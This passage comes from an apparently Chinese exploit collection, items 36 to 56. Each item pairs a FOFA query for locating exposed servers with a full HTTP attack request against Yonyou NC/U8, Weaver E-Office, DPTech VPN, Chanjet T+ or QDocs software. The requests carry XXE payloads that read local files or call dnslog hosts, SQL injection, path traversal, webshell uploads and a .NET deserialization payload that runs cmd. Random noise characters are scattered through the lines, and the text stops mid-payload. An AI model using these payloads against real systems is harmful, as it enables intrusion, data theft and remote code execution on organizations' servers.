Accept-Encoding: gzip, deflate6 _" @% r, m# K$ u
Accept: */*5 h4 c9 G* n& R2 b& s" W+ G3 ^
Connection: close
. H! F# D4 H& ^: K- S- xaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA8 x$ ]; j$ {! F: A
Content-Length: 1900 O7 D& _4 i" z, \0 M* O
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
- L, a, I# Q5 Y) P. \ d3 C2 D( o$ u9 _% |, j- ?
--fd28cb44e829ed1c197ec3bc71748df0
! A+ A3 `+ J4 ~. w* d% [/ r; qContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
Z' f7 ]4 w/ P1 j D
% z: u! l0 s; `/ G<%out.println(1111*1111);%>
8 \+ ~# d+ ^( f# A% @ l9 v--fd28cb44e829ed1c197ec3bc71748df0--7 Z$ s% j- v- E& C5 D+ m- t
7 A, ? r0 V; m2 N
c9 h( F+ C0 S/ b
36. 用友NC-Cloud soapFormat XXE4 A6 N9 w$ j+ L( p$ d% u& |
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
5 H: v& o M6 H' p5 A, J9 m1 fPOST /uapws/soapFormat.ajax HTTP/1.1
7 |: x7 [ s' {! H R0 j& f: HHost: 192.168.40.130:8989" a+ h; C o0 N% E' q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.09 S% o4 x/ q' `7 t+ ]: g8 L
Content-Length: 2634 u0 S# p. j5 n7 t3 C. P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! }; w1 A' z$ I4 \ s9 UAccept-Encoding: gzip, deflate k- S' I$ K/ k3 N- }+ z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% m2 r/ ~7 k0 `, n$ `/ ^Connection: close3 c- y3 t; W4 a: W) T y! m, s2 E) ^
Content-Type: application/x-www-form-urlencoded
# I* P# f9 F+ H2 r1 @. }$ @3 ~+ X$ mUpgrade-Insecure-Requests: 1$ `0 p1 h3 M" J% g; H9 |
; e* }# ]; p1 z% S1 j" |7 a1 y
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a& q1 ]. T/ X0 y; z: \5 g. V `
2 U! K$ |+ q4 n! Z3 ]% a
- h$ b. [$ K" _% t
37. 用友NC-Cloud IUpdateService XXE
4 b1 s& } E; f$ P0 W4 d; FFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"/ `( _6 e c( X: B
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
# y4 }3 r- E2 [, ?* e+ }Host: 192.168.40.130:8989
2 Q" Q$ k' U6 y0 K: qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
4 d( X! ]3 \. T2 K- E) b' }Content-Length: 421) E b& F. W" s4 o: H0 J# x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9( ]4 v }2 h" N1 o4 g
Accept-Encoding: gzip, deflate) _+ g8 C& r. [( q) G! J* V
Accept-Language: zh-CN,zh;q=0.9
. t! \7 [0 i, T2 M+ I, T. DConnection: close# {! r: W( Z5 `
Content-Type: text/xml;charset=UTF-8
' D# D; `% A; G$ D; _8 w. @7 aSOAPAction: urn:getResult& K6 P& Z2 f$ s! a8 g
Upgrade-Insecure-Requests: 1
. B) Y2 n$ @' d% z' u; y5 | c1 h' \" m2 W; B4 z3 p, r3 ]
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
! I; z9 O" Y N" B, Q+ }<soapenv:Header/>1 S: f$ e- V# L8 I p: x, b, s6 s
<soapenv:Body>
+ N% i- `: Y# m. L<iup:getResult>$ d+ P0 ?9 p6 |- }
<!--type: string-->
7 l9 [1 M6 V& U; O, z<iup:string><![CDATA[/ ~* Y, F: d. W( n# v9 w- J O
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>$ l4 D/ ?6 [; Z! V# E
<xxx/>]]></iup:string>
. Z7 M- I! ?$ i* X9 a$ I</iup:getResult>
! b7 L( \: ^0 d# F( z! h$ n</soapenv:Body>
' G0 q% D9 ^( Y5 S8 t& o</soapenv:Envelope>( m* o8 r1 y, g8 W$ z/ l. ~1 C( D
& I3 F H2 E1 w5 z1 Y: b
3 K+ \; @4 [/ P* Q6 w# ^/ P. s; B' }5 g
38. 用友U8 Cloud smartweb2.RPC.d XXE& s0 F1 E* E1 n1 b x( R6 o Z
FOFA:app="用友-U8-Cloud"
9 `; I D/ t5 k/ MPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
' d* Q1 f- J; _* ]1 eHost: 192.168.40.131:8088
% [& n; k# q' ^% g- Z9 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
" N5 A* P8 l% X6 Q2 y2 I' Q) EContent-Length: 260 N6 Y" R" O d- ?( ?' u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
0 `9 i, ]3 w' QAccept-Encoding: gzip, deflate
* A' m2 K" O4 i9 I! eAccept-Language: zh-CN,zh;q=0.9
' Y0 A% c7 w9 i: nConnection: close
1 a0 }4 }; \# G! r4 L6 D; m. HContent-Type: application/x-www-form-urlencoded h6 @* K9 J( k# |1 X
9 ~+ T# Y& s/ K" @1 y* k& y__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>7 d" @) R# M" k( p
( ^* E1 L2 |8 [7 G# H6 |% V0 m1 o* }/ F; v: P% l# c. P
39. 用友U8 Cloud RegisterServlet SQL注入& H. I7 S- i( t9 u
FOFA:title="u8c"3 C% ?& A- l. |2 q& \. _
POST /servlet/RegisterServlet HTTP/1.1
4 R; R8 M+ Y9 CHost: 192.168.86.128:8089
' q, n1 ]8 h3 j" w& |' E- XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36$ t ~- I' s& s- A8 d
Connection: close! E5 @5 {; o$ M
Content-Length: 85
3 f& q+ Y% t3 @; O8 q: oAccept: */*( C! Q) M0 S9 k- g2 b% {* K+ G
Accept-Language: en3 {$ e9 C6 S& e4 D/ c! O( a$ `
Content-Type: application/x-www-form-urlencoded
9 z1 K/ D! ~9 J0 dX-Forwarded-For: 127.0.0.13 a4 q6 I1 g( Y. k; C! v& S/ _
Accept-Encoding: gzip7 o$ T& L) u( x5 b: Z7 D6 ~
' K: z4 a, N+ H/ `" d/ K" ausercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--4 s& c" n8 {$ z& l3 K
b" x" b( }) h" }* d
6 k! ~7 _! M+ I$ X1 E40. 用友U8-Cloud XChangeServlet XXE! p1 h! ~; c' { [* `
FOFA:app="用友-U8-Cloud"7 |8 u' b3 ?8 j$ o9 ^
POST /service/XChangeServlet HTTP/1.1. K8 r, c m' q( Z; S4 W
Host: x.x.x.x
+ g, d; _( W# p2 N# FUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" [& w3 O6 [" P+ W
Content-Type: text/xml9 h7 ~! U( P0 Y4 k B# g \
Connection: close* F! V( }' w7 b+ s
* p. ]( u! ^- ~<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>2 s3 x; `! L; i2 Z
4 B6 X9 o9 a; R8 _* n
6 s% W$ A6 s6 y6 {0 a1 \
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
( |$ ?: ^6 e' A* L% V. v8 jFOFA:app="用友-U8-Cloud"
9 h% J9 H) l, F' N. X* Q' hGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
+ d' B; e; R: |! M A* oHost:# h) ]( ~0 _$ ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 M6 v: h! N/ E( v8 l
Content-Type: application/json' e. z4 J6 a: Z+ l: ~1 u
Accept-Encoding: gzip
5 i2 d& h2 M9 M; L b9 ^6 E: lConnection: close- h! O" a, p7 S+ U& R3 I
! x) D9 q9 i! g5 V& P, b4 x+ i) Y; r5 C
42. 用友GRP-U8 SmartUpload01 文件上传
2 h7 U9 m7 [7 |FOFA:app="用友-GRP-U8"; p, c& t t- Y
POST /u8qx/SmartUpload01.jsp HTTP/1.1
" J6 A1 N5 N0 `6 f9 {Host: x.x.x.x6 C7 ]. r* E6 @( J
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt; o. H+ d0 g& k6 M$ }; Q% u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
0 a; l& [- b+ i1 W( Y+ O W8 e; r# l- r& [3 l
PAYLOAD% V7 Q( C. d% N% ?" J* {& d
# J# w! g- U. J& b$ U5 @
6 f1 u& }. e( W4 Y2 D; d' ~http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml/ ]! P0 t4 w' X6 M1 y9 B( L/ g
: o/ ^! K/ I' u0 B" k
43. 用友GRP-U8 userInfoWeb SQL注入致RCE0 w# X5 V9 w: a X4 G
FOFA:app="用友-GRP-U8"
7 c( U0 X3 x$ j8 NPOST /services/userInfoWeb HTTP/1.1
: [8 O) @3 a2 zHost: your-ip' |- X" I& D% `+ _/ w( F3 e' ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.365 u1 R4 X, c) \' |+ `6 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 d" a( q6 S7 ]6 ^5 h: |" W$ TAccept-Encoding: gzip, deflate Q5 d! ^! u( X; j' a' U$ P9 w9 j
Accept-Language: zh-CN,zh;q=0.9# ~) [! r6 F/ x" i
Connection: close
0 N7 G4 `9 y$ j$ O: Q" QSOAPAction:
: U5 T9 t; Z- T7 b' {! NContent-Type: text/xml;charset=UTF-8) E- n! j" Z# j+ w5 f
; X- a" c4 E# J7 E0 U F$ m$ U<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
6 J% |. ^. V) P <soapenv:Header/>' @% Z0 P$ V/ h. T' v
<soapenv:Body>
& ?1 }! X. I P1 \: R4 j, w9 E <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">1 S$ r" A9 j0 _; c7 Y( c# l/ I
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>3 Q2 O, W3 t j4 J
</ser:getUserNameById>
% `, W0 u) X4 K4 Q! | </soapenv:Body>' y- @( f( [5 }1 [/ p, T
</soapenv:Envelope>7 U( l, p" T) k- h5 |
4 j( B0 k, F7 m' ~; X! j
5 h* o, D& ^4 W* H+ E44. 用友GRP-U8 bx_dj_check.jsp SQL注入2 }+ ]) G0 a) [, a
FOFA:app="用友-GRP-U8") L8 n* J- C6 C% Y* X
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
: c6 O( _. g7 D( x2 |5 s) \Host: your-ip
; t+ F F' Y& }" T' _5 }5 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36+ ^; ^7 q. f2 Y6 q( k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 a7 f: x( h; Q0 @9 `4 M2 H( T: e
Accept-Encoding: gzip, deflate: B. ^" Q: b& F/ t q
Accept-Language: zh-CN,zh;q=0.9
~- {1 v. B% rConnection: close9 y3 Y8 K* ?- }9 ]
& t, i5 w. ?7 X4 F
" `0 \2 [; V2 C( `45. 用友GRP-U8 ufgovbank XXE
" E" `" N! |1 ~8 z: FFOFA:app="用友-GRP-U8"; N5 x& W. X& _1 r. `) N
POST /ufgovbank HTTP/1.1
; w# y8 O7 ?0 YHost: 192.168.40.130:222
7 z! a+ `4 ]. q5 D/ F: fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0' m. A4 L1 r' Y* ]4 a+ z
Connection: close0 C" w1 l7 D; J, x& g/ j8 `: J) i# o
Content-Length: 161: g( c; l( l1 H1 _1 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% H5 V, z9 c/ h5 w9 `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 s) x" P- g$ p. P+ c9 ]3 B% M5 E
Content-Type: application/x-www-form-urlencoded
, u" H* u, U3 ?' t8 R) Z+ uAccept-Encoding: gzip
' Z7 K1 s5 B B; x7 x
$ @! H1 i$ U& N5 g. u! E. CreqData=<?xml version="1.0"?>5 f3 Z( I+ R% h* U$ H/ P
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest+ \) @( @8 u+ v7 g9 d: y; \+ ^
' _% g1 M& f, k9 i8 P
( N# }6 L# X; C9 k
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
$ w+ a7 ~( m: @2 k. Q" xFOFA:app="用友-GRP-U8"
3 U5 i7 _4 [" G' `; ^GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
% q6 n, J' Y1 Z& `$ EHost: your-ip4 R; U+ o3 R% h( `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
1 O# o' w0 ]! @! {' ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ @2 W' T. n- H/ I. V. X) S+ u: b
Accept-Encoding: gzip, deflate
$ o% L& k5 I3 |2 v! B8 X- yAccept-Language: zh-CN,zh;q=0.9
1 z/ l" @' R' B% c/ xConnection: close
5 W7 x+ f- r7 P/ q) S! g. q! e# ?3 J- f
2 C% O4 ~+ M# Z
47. 用友GRP A++Cloud 政府财务云 任意文件读取7 H; m- @1 y/ V) R t% i
FOFA:body="/pf/portal/login/css/fonts/style.css"
* L5 s N8 |4 zGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
7 ?) c( H# |% y t* qHost: x.x.x.x
% E; [ P1 b) E9 X$ o. m& yCache-Control: max-age=03 e' W8 O$ `0 L* q/ ? t3 @, J, y
Upgrade-Insecure-Requests: 12 k1 k9 w, s ^$ P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: |4 h4 Y! u, a) j/ d$ b6 R S b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- F' Y# b4 y: U: V; ZAccept-Encoding: gzip, deflate, br, W0 d6 b- O4 z9 @
Accept-Language: zh-CN,zh;q=0.94 e3 c& [! v+ g6 e- g
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
2 c9 ~2 v5 q0 j# N* x. E" ?% cConnection: close
& q1 u3 ]9 c+ W, i3 ]( E: A3 }7 T
2 D9 n- e$ r7 G0 y3 Y+ G+ W g# ^& i+ r/ N2 n
$ I5 E. e* q" y% `! M/ U& A; z48. 用友U8 CRM swfupload 任意文件上传- Y# I$ u5 s1 K, ]1 y: W$ w
FOFA:title="用友U8CRM"* |* u6 R. V: o, a6 r
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1 q/ i( t0 V8 U$ D
Host: your-ip) U7 y1 s. y* D2 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& l! O, | ~9 c* ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ H0 D3 H: `' q+ l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 w* C: C' F ?2 s( x
Accept-Encoding: gzip, deflate& T/ m9 H& h" A& n# s3 i& c
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855" E3 _. M) M$ [* _5 S3 \3 l9 b
------269520967239406871642430066855
: L" f$ T. q9 F& f( GContent-Disposition: form-data; name="file"; filename="s.php"6 v8 U1 J3 M. R" E0 A
1231. A# m# e9 H, L$ B
Content-Type: application/octet-stream2 i% M. J* x+ G$ I6 q8 \+ S" r
------269520967239406871642430066855
/ t# w9 Y0 g2 TContent-Disposition: form-data; name="upload"
% ^# c+ p$ ~+ H7 J) `4 dupload
# S) o% R8 c, S------269520967239406871642430066855--
, j" n! |' V0 d- m% w/ ~% M0 x }# M. T5 b( F# f5 u5 W" p! ]
+ i8 U5 l7 l7 ?( n
49. 用友U8 CRM系统uploadfile.php接口任意文件上传" t$ G' ^: Q! T, v# R
FOFA:body="用友U8CRM"1 q3 r* Z9 Q8 F) p5 m1 {! D- w$ ]
. ^5 X7 ~% q' w2 u
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1, z6 ^5 E: p- B2 ^( @. k2 |
Host: x.x.x.x
- E2 R" a0 N7 }' j2 i7 @8 v% Q h2 M/ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 g8 g d9 {' m# M8 {& q+ s5 L7 c
Content-Length: 329* S1 m% |8 h6 s, S2 x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 u( A4 {; B" z* G7 U! }3 ?
Accept-Encoding: gzip, deflate
4 c$ @0 }# O3 Q$ T1 _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 Z* M2 t4 U9 U' SConnection: close; B7 _" B) i: Z$ y6 p$ _* I+ q
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
( D h* j4 V ^6 k2 B' D( Z! m. Q) z0 X& ^
-----------------------------vvv3wdayqv3yppdxvn3w8 j$ ?. v: \4 i$ \; p" Y$ v" c, ]6 J
Content-Disposition: form-data; name="file"; filename="%s.php "
4 }9 K4 L& U y Z1 u9 dContent-Type: application/octet-stream
$ Y6 s% G# H v& \' _9 @3 n0 z7 S a& U" J7 h8 P* A2 b* t
wersqqmlumloqa
( L, ?, _! s" r: y* k-----------------------------vvv3wdayqv3yppdxvn3w
2 Z- Z1 k8 M! Y/ W. OContent-Disposition: form-data; name="upload"3 _5 P9 Z1 S* F
0 b' @, N" ~* a7 {' e
upload
7 G; N4 u6 F, d% q2 e-----------------------------vvv3wdayqv3yppdxvn3w--& i9 C, u7 s; {6 ]3 B% v
2 B1 v- W; b: X- z% B
: J5 w2 a. F, {! K8 @ v
http://x.x.x.x/tmpfile/updB3CB.tmp.php
( t, N2 T7 O! M
. x4 M8 ^1 v0 @6 k! ]8 b+ v- \* f+ X50. QDocs Smart School 6.4.1 filterRecords SQL注入$ K; f7 ~$ V) Z) [$ G/ B. u( W
FOFA:body="close closebtnmodal"
# C0 F0 u* P" q. ? ~' q6 rPOST /course/filterRecords/ HTTP/1.1( O' W9 m. z5 F/ M# D
Host: x.x.x.x' ]0 I) K" H; |* b& `' Q% U
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 j5 z6 |/ p: g' r" s3 d1 nConnection: close4 e: y' z. {2 q2 O, O7 Y% F6 F
Content-Length: 224
/ I6 g- a+ y4 \, [# R# K MAccept: */*
$ }+ z' d. ^# ?' Q2 o; D# H3 vAccept-Language: en$ g: C& K8 J/ H" o- j% o) q
Content-Type: application/x-www-form-urlencoded- j% E1 v+ h8 J6 s- `& k& C
Accept-Encoding: gzip
. i/ Z; x* \4 `: k5 e) r1 s5 s6 F, x0 h/ f0 e, [' q
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
! W% l2 @. H. }0 W" |$ i3 h
! W$ {. u8 K5 Q7 T# H- D0 C) t
, F# o* `" i1 q n51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入% s" A5 y; V) j( k9 h' w% m1 A
FOFA:app="云时空社会化商业ERP系统"7 I' ]% y6 @- X. K" ]
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1: C% L& z) B" ?5 h3 B
Host: your-ip
3 n3 e% o. |8 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36# w0 @# T: P& L8 a4 ^) Q' `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ _8 K2 a$ ]/ x, ?" e7 k
Accept-Encoding: gzip, deflate0 K! g+ P0 X4 X8 A, X
Accept-Language: zh-CN,zh;q=0.9
3 o/ s! g1 Y, K0 EConnection: close
+ H+ B9 r2 _) t9 b1 s+ r: n
& I U% m/ ~, H! J$ D& a9 X$ o0 t. }% O& h
52. 泛微E-Office json_common.php sql注入
! ^' O' w( S5 ]' T: lFOFA:app="泛微-EOffice"8 _& ]! X2 o- n4 B& F/ h
POST /building/json_common.php HTTP/1.1
2 v3 ~+ j- u6 C" R5 j$ p% @4 z2 PHost: 192.168.86.128:8097) i; a' ~9 S+ K9 ]# K: x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 H& m, p" ]3 @1 K+ R- r1 [Connection: close
5 p' m$ ]8 r- k t8 O' w. h; {+ S" oContent-Length: 87$ m& `& b( Y. e( t
Accept: */*0 e& J/ p* s1 J5 V8 b* I- `
Accept-Language: en0 O3 J, P: T, F# `
Content-Type: application/x-www-form-urlencoded9 \: v0 C0 _- Q" M r
Accept-Encoding: gzip B1 m; {+ U1 B6 J
! L% o* Z E# v4 X8 m' M
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333: \% i7 m0 @7 Y9 l# c
' B' D; y2 p: |* g3 K
+ }8 R% A. A6 v; v
53. 迪普 DPTech VPN Service 任意文件上传1 \- f& @% k. ]
FOFA:app="DPtech-SSLVPN"3 L4 ~# u/ h3 t6 w/ c% g3 I
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd/ C! U& M* u: M
: G; v+ M% B/ x% {8 R
6 ?0 c: P! g( r54. 畅捷通T+ getstorewarehousebystore 远程代码执行5 O% L) O$ ?; T& w! g
FOFA:app="畅捷通-TPlus"1 B& U& A! v6 N: V. d/ K0 B
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件( Y O% `; g8 t4 V
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
% r' W. Y& w8 `5 [3 |0 g, M4 }
r, r; n% {3 Q' r' v' B% H& [
3 J; A% K6 S$ {# x& P完整数据包
; S; [' z/ C1 V6 ?POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
& y+ o- b, T) }2 FHost: x.x.x.x
" [' d/ c3 ^# kUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
3 z$ N3 J X2 w [9 AContent-Length: 593$ Q8 }/ w' g$ B$ [" Z$ P6 \
1 F) [; m: |! `& }3 g
{
9 Y4 X( v& h! X* P"storeID":{
) h R; k' [/ T/ i8 ~3 s; x& J' y "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",: ?- t% m' [& p
"MethodName":"Start",
: l8 l/ i |5 U1 g "ObjectInstance":{5 |) A/ |+ M; Q+ Y9 ~- S; m2 r7 g
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",+ X! l$ G3 n1 }& E# m0 n# L
"StartInfo":{
4 u- M+ E4 p3 f/ |# F- b0 ], ~ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",' `7 C" U: R4 }( i# q4 _ I" f
"FileName":"cmd",$ d- p6 L) P* i; r+ f7 a
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% n/ I1 e Z" g
}+ k3 E$ n8 V" P, X. J |0 C
}1 O0 H: Q: ^- ~1 ~9 Q4 D! N
}8 n5 Y( ?( e* @: @9 |
}
6 h7 X; |6 Y' J* ^) D6 u A/ _$ @' ~& u# x5 B" x: R3 u& ~
& b% o1 E( H: d
第二步,访问如下url
: ]3 ^5 G) M E5 t/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt+ _ U8 Z. r) O1 l+ I
! s, G" ]) q6 G3 P6 I
# T1 U2 V/ b. F: P7 l. n$ H
55. 畅捷通T+ getdecallusers信息泄露# D% K2 Y# w2 y7 @* M) X/ X
FOFA:app="畅捷通-TPlus"
1 P; i. B" y! u: R% x+ C3 X% o' |第一步,通过2 G7 p: N" Q( \1 g; @; o! ~
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie. x% P$ u9 N. _, Y. Z6 F
第二步,利用获取到的Cookie请求6 f# ?) {. ]1 C
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
2 u. k. T: @; s* h+ w$ j* J( o0 S q, @3 Y9 a/ b1 Z l$ u
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE5 ]+ \# ?: a U5 p/ E% R% T
FOFA: app="畅捷通-TPlus" Q. M" N( I! c5 w) M
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
; r1 p e6 p; K% s% lHost: x.x.x.x
0 ^! l0 L( C, k0 m9 R5 z8 \0 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
! u+ Z1 ~7 A1 G/ ^Content-Type: application/json
& }5 o. Q; m. c: c* P
- U) E: j+ {* }) o5 n0 d{
, J* ^ z! H2 m! b "storeID":{
